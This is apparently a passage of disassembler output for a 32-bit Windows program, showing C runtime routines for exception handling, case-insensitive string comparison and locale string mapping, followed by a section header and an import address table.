; =============== S U B R O U T I N E =======================================
sub_420A6B proc near ; DATA XREF: _1:off_422CC8�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_420A87
test [esp+4+arg_0], 1
jz short loc_420A81
push esi
call sub_416457
pop ecx
loc_420A81: ; CODE XREF: sub_420A6B+D�j
mov eax, esi
pop esi
retn 4
sub_420A6B endp
; =============== S U B R O U T I N E =======================================
sub_420A87 proc near ; CODE XREF: sub_420A6B+3�p
; DATA XREF: _1:004230BC�o
mov dword ptr [ecx], offset off_422CC8
jmp sub_4208CA
sub_420A87 endp
; =============== S U B R O U T I N E =======================================
sub_420A92 proc near ; CODE XREF: sub_420B06+46�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_420A28
mov dword ptr [esi], offset off_422C9C
mov eax, esi
pop esi
retn 4
sub_420A92 endp
; =============== S U B R O U T I N E =======================================
sub_420AAA proc near ; CODE XREF: sub_403631+15�p
; sub_40368A+15�p ...
mov eax, offset loc_421286
call sub_416438
sub esp, 30h
lea eax, [ebp-0Dh]
push eax
push offset aStringTooLong ; "string too long"
lea ecx, [ebp-20h]
call sub_4208A0
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_4209E0
push offset dword_4230B8
lea eax, [ebp-3Ch]
push eax
mov dword ptr [ebp-3Ch], offset off_422CC8
call sub_420CE3
int 3 ; Trap to Debugger
sub_420AAA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_420AEE proc near ; CODE XREF: sub_420B06+28�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_420A28
mov dword ptr [esi], offset off_422CC8
mov eax, esi
pop esi
retn 4
sub_420AEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420B06 proc near ; DATA XREF: _1:00422C94�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_420A28
push offset dword_4230F8
lea eax, [ebp+var_1C]
push eax
call sub_420CE3
int 3 ; Trap to Debugger
loc_420B24: ; DATA XREF: _1:00422CD0�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_420AEE
push offset dword_4230B8
lea eax, [ebp+var_1C]
push eax
call sub_420CE3
int 3 ; Trap to Debugger
loc_420B42: ; DATA XREF: _1:00422CA4�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_420A92
push offset dword_423010
lea eax, [ebp+var_1C]
push eax
call sub_420CE3
int 3 ; Trap to Debugger
sub_420B06 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_420B60 proc near ; CODE XREF: sub_402FC3+5E�p
; sub_403A1B+159�p
jmp ds:dword_4221FC
sub_420B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_420B66 proc near ; CODE XREF: sub_4160A4+23�p
; sub_416348+13�p
jmp ds:dword_422170
sub_420B66 endp
; =============== S U B R O U T I N E =======================================
sub_420B6C proc near ; CODE XREF: sub_4079D8+E2�p
; sub_4079D8+F9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp ds:dword_4C911C, 0
push ebx
jnz short loc_420BB2
mov edx, [esp+4+arg_4]
mov ecx, [esp+4+arg_0]
loc_420B7E: ; CODE XREF: sub_420B6C+42�j
mov bx, [ecx]
cmp bx, 5Ah
ja short loc_420B90
cmp bx, 41h
jb short loc_420B90
add ebx, 20h
loc_420B90: ; CODE XREF: sub_420B6C+19�j
; sub_420B6C+1F�j
mov ax, [edx]
cmp ax, 5Ah
ja short loc_420BA2
cmp ax, 41h
jb short loc_420BA2
add eax, 20h
loc_420BA2: ; CODE XREF: sub_420B6C+2B�j
; sub_420B6C+31�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_420BE2
cmp bx, ax
jz short loc_420B7E
jmp short loc_420BE2
; ---------------------------------------------------------------------------
loc_420BB2: ; CODE XREF: sub_420B6C+8�j
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, [esp+0Ch+arg_4]
loc_420BBC: ; CODE XREF: sub_420B6C+72�j
mov ax, [esi]
inc esi
push eax
inc esi
call sub_420D1D
mov ebx, eax
mov ax, [edi]
inc edi
push eax
inc edi
call sub_420D1D
pop ecx
test bx, bx
pop ecx
jz short loc_420BE0
cmp bx, ax
jz short loc_420BBC
loc_420BE0: ; CODE XREF: sub_420B6C+6D�j
pop edi
pop esi
loc_420BE2: ; CODE XREF: sub_420B6C+3D�j
; sub_420B6C+44�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
retn
sub_420B6C endp
; =============== S U B R O U T I N E =======================================
sub_420BEC proc near ; CODE XREF: _0:00420C04�p
mov dword ptr [ecx], offset off_422CE8
mov ecx, [ecx+4]
test ecx, ecx
jz short locret_420C00
push ecx
call sub_415DE1
pop ecx
locret_420C00: ; CODE XREF: sub_420BEC+B�j
retn
sub_420BEC endp
; ---------------------------------------------------------------------------
loc_420C01: ; DATA XREF: _1:off_422CE8�o
push esi
mov esi, ecx
call sub_420BEC
test byte ptr [esp+8], 1
jz short loc_420C17
push esi
call sub_416457
pop ecx
loc_420C17: ; CODE XREF: _0:00420C0E�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_420C1D: ; DATA XREF: _1:off_422CF0�o
push esi
mov esi, ecx
call sub_420CC0
test byte ptr [esp+8], 1
jz short loc_420C33
push esi
call sub_416457
pop ecx
loc_420C33: ; CODE XREF: _0:00420C2A�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_420C39 proc near ; CODE XREF: sub_42090E+1D�p
; sub_4209E0+1D�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_422CF0
push dword ptr [edi]
call sub_415C80
inc eax
push eax
call sub_4167A5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_420C68
push dword ptr [edi]
push eax
call sub_415B90
pop ecx
pop ecx
loc_420C68: ; CODE XREF: sub_420C39+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_420C39 endp
; =============== S U B R O U T I N E =======================================
sub_420C76 proc near ; CODE XREF: sub_420A28+16�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_422CF0
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_420CB3
push dword ptr [edi+4]
call sub_415C80
inc eax
push eax
call sub_4167A5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_420CB9
push dword ptr [edi+4]
push eax
call sub_415B90
pop ecx
pop ecx
jmp short loc_420CB9
; ---------------------------------------------------------------------------
loc_420CB3: ; CODE XREF: sub_420C76+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_420CB9: ; CODE XREF: sub_420C76+2E�j
; sub_420C76+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_420C76 endp
; =============== S U B R O U T I N E =======================================
sub_420CC0 proc near ; CODE XREF: sub_4208CA+16�j
; _0:00420C20�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_422CF0
jz short locret_420CD5
push dword ptr [ecx+4]
call sub_416457
pop ecx
locret_420CD5: ; CODE XREF: sub_420CC0+A�j
retn
sub_420CC0 endp
; =============== S U B R O U T I N E =======================================
sub_420CD6 proc near ; DATA XREF: _1:00422CF4�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_420CE2
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_420CE2: ; CODE XREF: sub_420CD6+5�j
retn
sub_420CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420CE3 proc near ; CODE XREF: sub_420983+37�p
; sub_420AAA+3E�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_422D10
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:dword_4221A4 ; RaiseException
pop edi
pop esi
leave
retn 8
sub_420CE3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D1D proc near ; CODE XREF: sub_420B6C+56�p
; sub_420B6C+63�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp ax, 0FFFFh
jnz short loc_420D2F
or ax, ax
leave
retn
; ---------------------------------------------------------------------------
loc_420D2F: ; CODE XREF: sub_420D1D+B�j
cmp ds:dword_4C911C, 0
jnz short loc_420D49
cmp ax, 41h
jb short locret_420D90
cmp ax, 5Ah
ja short locret_420D90
add eax, 20h
leave
retn
; ---------------------------------------------------------------------------
loc_420D49: ; CODE XREF: sub_420D1D+19�j
cmp ax, 100h
jnb short loc_420D63
push 1
push eax
call sub_420FCB
pop ecx
test eax, eax
pop ecx
jnz short loc_420D63
mov ax, word ptr [ebp+arg_0]
leave
retn
; ---------------------------------------------------------------------------
loc_420D63: ; CODE XREF: sub_420D1D+30�j
; sub_420D1D+3E�j
push 0
lea eax, [ebp+var_2]
push 1
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 100h
push ds:dword_4C911C
call sub_420D92
add esp, 1Ch
test eax, eax
mov ax, word ptr [ebp+arg_0]
jz short locret_420D90
mov ax, [ebp+var_2]
locret_420D90: ; CODE XREF: sub_420D1D+1F�j
; sub_420D1D+25�j ...
leave
retn
sub_420D1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D92 proc near ; CODE XREF: sub_420D1D+5F�p
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_422D30
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
cmp ds:dword_4C9374, esi
jnz short loc_420E08
push esi
push esi
push 1
pop ebx
push ebx
push offset dword_4228C0
mov edi, 100h
push edi
push esi
call ds:dword_4221B0 ; LCMapStringW
test eax, eax
jz short loc_420DE6
mov ds:dword_4C9374, ebx
jmp short loc_420E08
; ---------------------------------------------------------------------------
loc_420DE6: ; CODE XREF: sub_420D92+4A�j
push esi
push esi
push ebx
push offset dword_4325D4
push edi
push esi
call ds:dword_4221AC ; LCMapStringA
test eax, eax
jz loc_420F87
mov ds:dword_4C9374, 2
loc_420E08: ; CODE XREF: sub_420D92+2E�j
; sub_420D92+52�j
cmp [ebp+arg_C], esi
jle short loc_420E1D
push [ebp+arg_C]
push [ebp+arg_8]
call sub_420F9B
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_420E1D: ; CODE XREF: sub_420D92+79�j
mov eax, ds:dword_4C9374
cmp eax, 1
jnz short loc_420E44
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4221B0 ; LCMapStringW
jmp loc_420F89
; ---------------------------------------------------------------------------
loc_420E44: ; CODE XREF: sub_420D92+93�j
cmp eax, 2
jnz loc_420F87
cmp [ebp+arg_18], esi
jnz short loc_420E5A
mov eax, ds:dword_4C912C
mov [ebp+arg_18], eax
loc_420E5A: ; CODE XREF: sub_420D92+BE�j
push esi
push esi
push esi
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
call ds:dword_422130 ; WideCharToMultiByte
mov [ebp+var_20], eax
cmp eax, esi
jz loc_420F87
mov [ebp+var_4], esi
add eax, 3
and al, 0FCh
call sub_415D00
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_1C], eax
jmp short loc_420EA0
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
mov [ebp+var_1C], esi
loc_420EA0: ; CODE XREF: sub_420D92+100�j
or [ebp+var_4], 0FFFFFFFFh
cmp [ebp+var_1C], esi
jz loc_420F87
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
call ds:dword_422130 ; WideCharToMultiByte
test eax, eax
jz loc_420F87
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4221AC ; LCMapStringA
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, esi
jz loc_420F87
mov [ebp+var_4], 1
add eax, 3
and al, 0FCh
call sub_415D00
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_420F23
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+var_2C]
loc_420F23: ; CODE XREF: sub_420D92+17D�j
cmp ebx, esi
jz short loc_420F87
push edi
push ebx
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4221AC ; LCMapStringA
test eax, eax
jz short loc_420F87
test byte ptr [ebp+arg_4+1], 4
jz short loc_420F61
mov eax, [ebp+arg_14]
cmp eax, esi
jz short loc_420F83
cmp eax, edi
jl short loc_420F52
mov eax, edi
loc_420F52: ; CODE XREF: sub_420D92+1BC�j
push eax
push ebx
push [ebp+arg_10]
call sub_416D30
add esp, 0Ch
jmp short loc_420F83
; ---------------------------------------------------------------------------
loc_420F61: ; CODE XREF: sub_420D92+1B1�j
cmp [ebp+arg_14], esi
jnz short loc_420F6A
push esi
push esi
jmp short loc_420F70
; ---------------------------------------------------------------------------
loc_420F6A: ; CODE XREF: sub_420D92+1D2�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_420F70: ; CODE XREF: sub_420D92+1D6�j
push edi
push ebx
push 1
push [ebp+arg_18]
call ds:dword_422134 ; MultiByteToWideChar
mov edi, eax
cmp edi, esi
jz short loc_420F87
loc_420F83: ; CODE XREF: sub_420D92+1B8�j
; sub_420D92+1CD�j
mov eax, edi
jmp short loc_420F89
; ---------------------------------------------------------------------------
loc_420F87: ; CODE XREF: sub_420D92+66�j
; sub_420D92+B5�j ...
xor eax, eax
loc_420F89: ; CODE XREF: sub_420D92+AD�j
; sub_420D92+1F3�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_420D92 endp
; =============== S U B R O U T I N E =======================================
sub_420F9B proc near ; CODE XREF: sub_420D92+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_420FBA
loc_420FAB: ; CODE XREF: sub_420F9B+1D�j
cmp word ptr [eax], 0
jz short loc_420FBA
inc eax
mov esi, ecx
inc eax
dec ecx
test esi, esi
jnz short loc_420FAB
loc_420FBA: ; CODE XREF: sub_420F9B+E�j
; sub_420F9B+14�j
cmp word ptr [eax], 0
pop esi
jnz short loc_420FC8
sub eax, [esp+arg_0]
sar eax, 1
retn
; ---------------------------------------------------------------------------
loc_420FC8: ; CODE XREF: sub_420F9B+24�j
mov eax, edx
retn
sub_420F9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420FCB proc near ; CODE XREF: sub_420D1D+35�p
var_4 = dword ptr -4
arg_0 = word ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFh
jz short loc_42100B
cmp [ebp+arg_0], 100h
jnb short loc_420FEF
movzx eax, [ebp+arg_0]
mov ecx, ds:off_42F364
mov ax, [ecx+eax*2]
jmp short loc_421012
; ---------------------------------------------------------------------------
loc_420FEF: ; CODE XREF: sub_420FCB+12�j
push 0
lea eax, [ebp+var_4]
push 0
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 1
call sub_42101D
add esp, 18h
test eax, eax
jnz short loc_42100F
loc_42100B: ; CODE XREF: sub_420FCB+A�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_42100F: ; CODE XREF: sub_420FCB+3E�j
mov eax, [ebp+var_4]
loc_421012: ; CODE XREF: sub_420FCB+22�j
movzx ecx, [ebp+arg_4]
movzx eax, ax
and eax, ecx
leave
retn
sub_420FCB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42101D proc near ; CODE XREF: sub_420FCB+34�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_422D48
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_4C9378
xor edi, edi
cmp eax, edi
jnz short loc_42108C
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4228C0
push esi
call ds:dword_422028 ; GetStringTypeW
test eax, eax
jz short loc_42106A
mov eax, esi
jmp short loc_421087
; ---------------------------------------------------------------------------
loc_42106A: ; CODE XREF: sub_42101D+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_4325D4
push esi
push edi
call ds:dword_42202C ; GetStringTypeA
test eax, eax
jz loc_4211CE
push 2
pop eax
loc_421087: ; CODE XREF: sub_42101D+4B�j
mov ds:dword_4C9378, eax
loc_42108C: ; CODE XREF: sub_42101D+2F�j
cmp eax, 1
jnz short loc_4210A8
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_422028 ; GetStringTypeW
jmp loc_4211D0
; ---------------------------------------------------------------------------
loc_4210A8: ; CODE XREF: sub_42101D+72�j
cmp eax, 2
jnz loc_4211CE
cmp [ebp+arg_10], edi
jnz short loc_4210BE
mov eax, ds:dword_4C912C
mov [ebp+arg_10], eax
loc_4210BE: ; CODE XREF: sub_42101D+97�j
push edi
push edi
push edi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
call ds:dword_422130 ; WideCharToMultiByte
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz loc_4211CE
mov [ebp+var_4], edi
add eax, 3
and al, 0FCh
call sub_415D00
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_2C], eax
push esi
push edi
push eax
call sub_415500
add esp, 0Ch
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_42111C
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_2C], edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_42111C: ; CODE XREF: sub_42101D+EA�j
cmp [ebp+var_2C], edi
jz loc_4211CE
push edi
push edi
push esi
push [ebp+var_2C]
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
call ds:dword_422130 ; WideCharToMultiByte
test eax, eax
jz loc_4211CE
mov [ebp+var_4], 1
lea eax, [esi+esi+2]
add eax, 3
and al, 0FCh
call sub_415D00
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
jmp short loc_421171
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
loc_421171: ; CODE XREF: sub_42101D+147�j
or [ebp+var_4], 0FFFFFFFFh
cmp ebx, edi
jz short loc_4211CE
mov eax, [ebp+arg_14]
cmp eax, edi
jnz short loc_421185
mov eax, ds:dword_4C911C
loc_421185: ; CODE XREF: sub_42101D+161�j
mov ecx, [ebp+arg_8]
lea edi, [ecx+ecx]
lea esi, [edi+ebx]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_0]
push eax
call ds:dword_42202C ; GetStringTypeA
mov [ebp+var_20], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_4211CE
cmp word ptr [esi], 0FFFFh
jnz short loc_4211CE
push edi
push ebx
push [ebp+arg_C]
call sub_416470
add esp, 0Ch
mov eax, [ebp+var_20]
jmp short loc_4211D0
; ---------------------------------------------------------------------------
loc_4211CE: ; CODE XREF: sub_42101D+61�j
; sub_42101D+8E�j ...
xor eax, eax
loc_4211D0: ; CODE XREF: sub_42101D+86�j
; sub_42101D+1AF�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_42101D endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4211E4 proc near ; DATA XREF: _1:00422EFC�o
; FUNCTION CHUNK AT 00403629 SIZE 00000008 BYTES
lea ecx, [ebp-38h]
jmp loc_403629
sub_4211E4 endp
; ---------------------------------------------------------------------------
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_421202
mov ecx, [ebp+8]
jmp loc_403629
; ---------------------------------------------------------------------------
locret_421202: ; CODE XREF: _0:004211F4�j
retn
; ---------------------------------------------------------------------------
loc_421203: ; DATA XREF: sub_4031FF�o
mov eax, offset dword_422ED0
jmp loc_4160F3
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp+14h]
jmp loc_403629
; ---------------------------------------------------------------------------
loc_421218: ; DATA XREF: _1:00422F2C�o
lea ecx, [ebp-1Ch]
jmp loc_403629
; ---------------------------------------------------------------------------
loc_421220: ; DATA XREF: sub_4033A1�o
mov eax, offset dword_422F00
jmp loc_4160F3
; ---------------------------------------------------------------------------
align 4
loc_42122C: ; DATA XREF: sub_40390C�o
mov eax, offset dword_422F30
jmp loc_4160F3
; ---------------------------------------------------------------------------
mov ecx, [ebp-14h]
jmp sub_420CC0
; ---------------------------------------------------------------------------
loc_42123E: ; DATA XREF: sub_42090E�o
mov eax, offset dword_422F90
jmp loc_4160F3
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_403629
; ---------------------------------------------------------------------------
loc_421250: ; DATA XREF: sub_420983�o
mov eax, offset dword_423028
jmp loc_4160F3
; ---------------------------------------------------------------------------
mov ecx, [ebp-14h]
jmp sub_420CC0
; ---------------------------------------------------------------------------
loc_421262: ; DATA XREF: sub_4209E0�o
mov eax, offset dword_42304C
jmp loc_4160F3
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_420CC0
; ---------------------------------------------------------------------------
loc_421274: ; DATA XREF: sub_420A28�o
mov eax, offset dword_423070
jmp loc_4160F3
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_403629
; ---------------------------------------------------------------------------
loc_421286: ; DATA XREF: sub_420AAA�o
mov eax, offset dword_4230D0
jmp loc_4160F3
_0 ends
; Section 2. (virtual address 00022000)
; Virtual size : 00001BB6 ( 7094.)
; Section size in file : 00001BB6 ( 7094.)
; Offset to raw data for section: 00022000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_1 segment para public 'CODE' use32
assume cs:_1
;org 422000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dword_422000 dd 77E668D9h ; DATA XREF: sub_409288+15D�r
dword_422004 dd 77E6BD68h ; DATA XREF: sub_4205B1+173�r
dword_422008 dd 77E77F2Eh ; DATA XREF: sub_420309+3E�r
; sub_420309+261�r
dword_42200C dd 77E762D0h ; DATA XREF: sub_420309+5B�r
; sub_420309+B9�r
dword_422010 dd 77E70192h ; DATA XREF: sub_41F310+F9�r
dword_422014 dd 77E7176Ch ; DATA XREF: sub_41EA2A+8�r
dword_422018 dd 77E7339Ch ; DATA XREF: sub_41E9F2+C�r
off_42201C dd offset sub_4D9C54 ; DATA XREF: _0:0041E9D9�r _0:0041E9EB�r
dword_422020 dd 77E73FF9h ; DATA XREF: sub_41DF8F+2C�r
dword_422024 dd 77E7FF2Eh ; DATA XREF: sub_41DE61:loc_41DEB1�r
; sub_41DED8:loc_41DF2B�r
dword_422028 dd 77E7C866h ; DATA XREF: sub_41DC83+3F�r
; sub_41DC83+12D�r ...
dword_42202C dd 77E641EBh ; DATA XREF: sub_41DC83+59�r
; sub_41DC83+8D�r ...
dword_422030 dd 77E78406h ; DATA XREF: sub_41D6DF+FF�r
; sub_41D6DF+166�r ...
dword_422034 dd 77E79C3Dh ; DATA XREF: sub_41D6DF+158�r
; sub_41D9A5+143�r
dword_422038 dd 77E7C931h ; DATA XREF: sub_41D6DF+19D�r
dword_42203C dd 77E77EE1h ; DATA XREF: sub_41D5AD+9�r
dword_422040 dd 77E67702h ; DATA XREF: sub_41D5AD:loc_41D5DC�r
; sub_41D5AD+E1�r
dword_422044 dd 77E73C49h ; DATA XREF: sub_401000+AD�r
; sub_40144A+95�r ...
dword_422048 dd 77E7751Ah ; DATA XREF: sub_401000+27�r
; sub_40144A+1A6�r ...
dword_42204C dd 77E802FCh ; DATA XREF: sub_4010B5+18C�r
; sub_4010B5+2D4�r ...
dword_422050 dd 77E6D75Bh ; DATA XREF: sub_4010B5+182�r
; sub_401A76+FF�r
dword_422054 dd 77E61BE6h ; DATA XREF: sub_4018D0+9A�r
; sub_4023A7+5D�r ...
dword_422058 dd 77E704FCh ; DATA XREF: sub_4022C6+20�r
; sub_409F1E+183�r ...
dword_42205C dd 77E70F89h ; DATA XREF: sub_4022C6+E�r
; sub_40A5B3+D�r ...
off_422060 dd offset sub_4DAA24 ; DATA XREF: sub_40409E+18�r
; sub_405898+58�r ...
dword_422064 dd 77E64106h ; DATA XREF: sub_404593+A0�r
; sub_409F1E+1B6�r
dword_422068 dd 77E64006h ; DATA XREF: sub_404593+8C�r
; sub_409F1E+19F�r
dword_42206C dd 77F5157Dh ; DATA XREF: sub_404716+289�r
; sub_405898:loc_4059D4�r ...
dword_422070 dd 77E7AC37h ; DATA XREF: sub_404716+254�r
; sub_405898+10E�r ...
off_422074 dd offset sub_4DB3D5 ; DATA XREF: sub_404716+202�r
; sub_405053+B2�r ...
off_422078 dd offset sub_4DA9EC ; DATA XREF: sub_404716+1F5�r
; sub_405053+38�r ...
off_42207C dd offset sub_4DB2B0 ; DATA XREF: sub_404716+1CB�r
; sub_405053+25�r ...
off_422080 dd offset sub_4DA7AF ; DATA XREF: sub_404716+110�r
; sub_409288+10F�r ...
off_422084 dd offset sub_4DA5FF ; DATA XREF: sub_4049CD+5EC�r
; sub_40752B+C0�r ...
dword_422088 dd 77E79424h ; DATA XREF: sub_4049CD+280�r
; sub_4079D8+135�r
dword_42208C dd 77E794BFh ; DATA XREF: sub_4049CD+272�r
; sub_4079D8+123�r
off_422090 dd offset sub_4DA626 ; DATA XREF: sub_4049CD+212�r
; sub_4049CD+5DB�r ...
off_422094 dd offset sub_4DA334 ; DATA XREF: sub_4049CD+201�r
; sub_40752B+26�r
off_422098 dd offset sub_4DB3FC ; DATA XREF: sub_405053+80�r
; sub_409A5D+BB�r ...
off_42209C dd offset sub_4DB460 ; DATA XREF: sub_405053+6C�r
; sub_40AB26+259�r ...
dword_4220A0 dd 77F7E300h ; DATA XREF: sub_405DAD+142�r
dword_4220A4 dd 77F7E21Fh ; DATA XREF: sub_405DAD+D7�r
dword_4220A8 dd 77E7C706h ; DATA XREF: sub_405FC5+77�r
dword_4220AC dd 77F53275h ; DATA XREF: sub_405FC5+6B�r
; sub_405FC5+22F�r
dword_4220B0 dd 77E79D8Ch ; DATA XREF: sub_406BF9+1B0�r
; sub_406BF9+1C4�r ...
off_4220B4 dd offset sub_4DB18D ; DATA XREF: sub_40767D+170�r
dword_4220B8 dd 77E78147h ; DATA XREF: sub_40767D+BC�r
off_4220BC dd offset sub_4DB076 ; DATA XREF: sub_40767D+60�r
; sub_407E65+11�r ...
off_4220C0 dd offset sub_4DAE83 ; DATA XREF: sub_40767D+5A�r
; sub_407E65+13A�r ...
dword_4220C4 dd 77F51597h ; DATA XREF: sub_40784F+41�r
; sub_40784F+F5�r ...
dword_4220C8 dd 77F516F8h ; DATA XREF: sub_40784F+21�r
; sub_4079D8+4A�r ...
dword_4220CC dd 77E77CB7h ; DATA XREF: sub_40784F+10�r
; sub_4079D8+40�r ...
